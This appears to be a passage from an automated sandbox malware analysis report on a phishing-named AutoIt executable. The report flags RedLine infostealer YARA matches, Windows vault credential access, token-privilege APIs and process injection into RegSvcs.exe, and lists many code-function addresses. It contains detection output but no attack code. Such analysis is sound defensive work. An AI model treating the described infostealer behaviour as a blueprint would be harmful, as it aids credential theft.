Source: name.exe, 00000008.00000000.3288300355.0000000000A75000.00000002.00000001.01000000.00000005.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_122a512e-b
Source: name.exe, 0000000A.00000000.3302257996.0000000000A75000.00000002.00000001.01000000.00000005.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_cba64940-b
Source: name.exe, 0000000A.00000000.3302257996.0000000000A75000.00000002.00000001.01000000.00000005.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_af207b85-7
Source: name.exe, 0000000E.00000002.3448805227.0000000000A75000.00000002.00000001.01000000.00000005.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_01034b26-c
Source: name.exe, 0000000E.00000002.3448805227.0000000000A75000.00000002.00000001.01000000.00000005.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_70c22f54-3
Source: Case_Your company bad driver Vehicle No.exe String found in binary or memory: This is a third-party compiled AutoIt script. memstr_9f1ae70c-5
Source: Case_Your company bad driver Vehicle No.exe String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_ce67c117-1
Source: name.exe.0.dr String found in binary or memory: This is a third-party compiled AutoIt script. memstr_426733da-3
Source: name.exe.0.dr String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_94d126c4-d
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} Jump to behavior
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Process Stats: CPU usage > 49%
Contains functionality to communicate with device drivers
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00C140B1: CreateFileW,_memset,DeviceIoControl,CloseHandle, 0_2_00C140B1
Contains functionality to launch a process as a different user
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00C08858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 0_2_00C08858
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00C1545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 0_2_00C1545F
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_00A2545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 8_2_00A2545F
Detected potential crypto function
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00BBE800 0_2_00BBE800
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00BDDBB5 0_2_00BDDBB5
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00C3804A 0_2_00C3804A
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00BBE060 0_2_00BBE060
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00BC4140 0_2_00BC4140
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00BD2405 0_2_00BD2405
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00BE6522 0_2_00BE6522
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00C30665 0_2_00C30665
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00BE267E 0_2_00BE267E
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00BD283A 0_2_00BD283A
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00BC6843 0_2_00BC6843
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00BE89DF 0_2_00BE89DF
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00C30AE2 0_2_00C30AE2
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00BE6A94 0_2_00BE6A94
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00BC8A0E 0_2_00BC8A0E
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00C0EB07 0_2_00C0EB07
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00C18B13 0_2_00C18B13
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00BDCD61 0_2_00BDCD61
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00BE7006 0_2_00BE7006
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00BC3190 0_2_00BC3190
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00BC710E 0_2_00BC710E
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00BB1287 0_2_00BB1287
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00BD33C7 0_2_00BD33C7
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00BDF419 0_2_00BDF419
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00BC5680 0_2_00BC5680
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00BD16C4 0_2_00BD16C4
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00BD78D3 0_2_00BD78D3
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00BC58C0 0_2_00BC58C0
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00BD1BB8 0_2_00BD1BB8
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00BE9D05 0_2_00BE9D05
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00BBFE40 0_2_00BBFE40
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00BDBFE6 0_2_00BDBFE6
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00BD1FD0 0_2_00BD1FD0
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_015136F0 0_2_015136F0
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_009CE800 8_2_009CE800
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_009EDBB5 8_2_009EDBB5
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_00A4804A 8_2_00A4804A
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_009CE060 8_2_009CE060
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_009D4140 8_2_009D4140
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_009E2405 8_2_009E2405
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_009F6522 8_2_009F6522
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_00A40665 8_2_00A40665
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_009F267E 8_2_009F267E
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_009E283A 8_2_009E283A
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_009D6843 8_2_009D6843
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_009F89DF 8_2_009F89DF
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_009F6A94 8_2_009F6A94
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_00A40AE2 8_2_00A40AE2
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_009D8A0E 8_2_009D8A0E
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_00A1EB07 8_2_00A1EB07
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_00A28B13 8_2_00A28B13
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_009ECD61 8_2_009ECD61
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_009F7006 8_2_009F7006
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_009D3190 8_2_009D3190
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_009D710E 8_2_009D710E
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_009C1287 8_2_009C1287
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_009E33C7 8_2_009E33C7
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_009EF419 8_2_009EF419
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_009D5680 8_2_009D5680
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_009E16C4 8_2_009E16C4
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_009E78D3 8_2_009E78D3
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_009D58C0 8_2_009D58C0
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_009E1BB8 8_2_009E1BB8
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_009F9D05 8_2_009F9D05
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_009CFE40 8_2_009CFE40
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_009E1FD0 8_2_009E1FD0
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_009EBFE6 8_2_009EBFE6
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_00F136F0 8_2_00F136F0
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 10_2_00F036F0 10_2_00F036F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 11_2_00408C60 11_2_00408C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 11_2_0040DC11 11_2_0040DC11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 11_2_00407C3F 11_2_00407C3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 11_2_00418CCC 11_2_00418CCC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 11_2_00406CA0 11_2_00406CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 11_2_004028B0 11_2_004028B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 11_2_0041A4BE 11_2_0041A4BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 11_2_00418244 11_2_00418244
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 11_2_00401650 11_2_00401650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 11_2_00402F20 11_2_00402F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 11_2_004193C4 11_2_004193C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 11_2_00418788 11_2_00418788
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 11_2_00402F89 11_2_00402F89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 11_2_00402B90 11_2_00402B90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 11_2_004073A0 11_2_004073A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 11_2_02ABD090 11_2_02ABD090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 11_2_02ABD960 11_2_02ABD960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 11_2_02ABCD48 11_2_02ABCD48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 11_2_02AB1030 11_2_02AB1030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 11_2_05A2C4C0 11_2_05A2C4C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 11_2_05A2E780 11_2_05A2E780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 11_2_05A26FF9 11_2_05A26FF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 11_2_05A24C20 11_2_05A24C20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 11_2_05A25428 11_2_05A25428
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 11_2_05A28F48 11_2_05A28F48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 11_2_05A2EED0 11_2_05A2EED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 11_2_05A20007 11_2_05A20007
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 11_2_05A20040 11_2_05A20040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 11_2_063C4DF8 11_2_063C4DF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 11_2_063C9BF8 11_2_063C9BF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 11_2_063C0CF0 11_2_063C0CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 11_2_063C8268 11_2_063C8268
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 11_2_063CE2E8 11_2_063CE2E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_02D3CD48 15_2_02D3CD48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_02D3D960 15_2_02D3D960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_02D3D090 15_2_02D3D090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_02D31030 15_2_02D31030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_03258B80 15_2_03258B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_0325E780 15_2_0325E780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_03256485 15_2_03256485
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_0325C4C0 15_2_0325C4C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_03250006 15_2_03250006
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_03250040 15_2_03250040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_03264DF0 15_2_03264DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_03269CD0 15_2_03269CD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_0326E2D8 15_2_0326E2D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_03267FB0 15_2_03267FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_03260CF0 15_2_03260CF0
Found potential string decryption / allocating functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: String function: 0040E1D8 appears 44 times
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: String function: 00BD0D27 appears 70 times
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: String function: 00BB7F41 appears 35 times
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: String function: 00BD8B40 appears 42 times
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: String function: 009E0D27 appears 70 times
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: String function: 009C7F41 appears 35 times
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: String function: 009E8B40 appears 42 times
Uses 32bit PE files
Source: Case_Your company bad driver Vehicle No.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Yara signature match
Source: 11.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 14.2.name.exe.3c50000.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 11.2.RegSvcs.exe.51d0ee8.5.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 8.2.name.exe.33a0000.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 11.2.RegSvcs.exe.29f1046.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.RegSvcs.exe.5490000.6.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.RegSvcs.exe.51d0ee8.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.RegSvcs.exe.51d0000.4.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.RegSvcs.exe.29f1046.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 10.2.name.exe.3710000.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 11.2.RegSvcs.exe.5490000.6.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 11.2.RegSvcs.exe.29f015e.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.RegSvcs.exe.51d0000.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.RegSvcs.exe.3d05d90.3.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.RegSvcs.exe.29f015e.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.RegSvcs.exe.3d05d90.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0000000A.00000002.3336864673.0000000003710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000008.00000002.3304083272.00000000033A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000B.00000002.3478077990.00000000051D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0000000B.00000002.3449507339.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000E.00000002.3449893133.0000000003C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000B.00000002.3478826370.0000000005490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.RegSvcs.exe.5490000.6.raw.unpack, cPs8D.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 11.2.RegSvcs.exe.5490000.6.raw.unpack, 72CF8egH.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 11.2.RegSvcs.exe.5490000.6.raw.unpack, G5CXsdn.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 11.2.RegSvcs.exe.5490000.6.raw.unpack, 3uPsILA6U.cs Cryptographic APIs: 'CreateDecryptor'
Source: 11.2.RegSvcs.exe.5490000.6.raw.unpack, 6oQOw74dfIt.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 11.2.RegSvcs.exe.5490000.6.raw.unpack, aMIWm.cs Cryptographic APIs: 'CreateDecryptor', 'TransformBlock'
Source: 11.2.RegSvcs.exe.5490000.6.raw.unpack, 3QjbQ514BDx.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 11.2.RegSvcs.exe.5490000.6.raw.unpack, 3QjbQ514BDx.cs Cryptographic APIs: 'TransformFinalBlock'
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winEXE@14/12@1/1
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00C1A2D5 GetLastError,FormatMessageW, 0_2_00C1A2D5
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00C08713 AdjustTokenPrivileges,CloseHandle, 0_2_00C08713
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00C08CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 0_2_00C08CC3
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_00A18713 AdjustTokenPrivileges,CloseHandle, 8_2_00A18713
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_00A18CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 8_2_00A18CC3
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00C1B59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode, 0_2_00C1B59E
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00C2F121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 0_2_00C2F121
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00C286D0 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear, 0_2_00C286D0
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00BB4FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource, 0_2_00BB4FE9
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe File created: C:\Users\user\AppData\Local\directory Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Mutant created: NULL
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe File created: C:\Users\user\AppData\Local\Temp\aut5AD0.tmp Jump to behavior
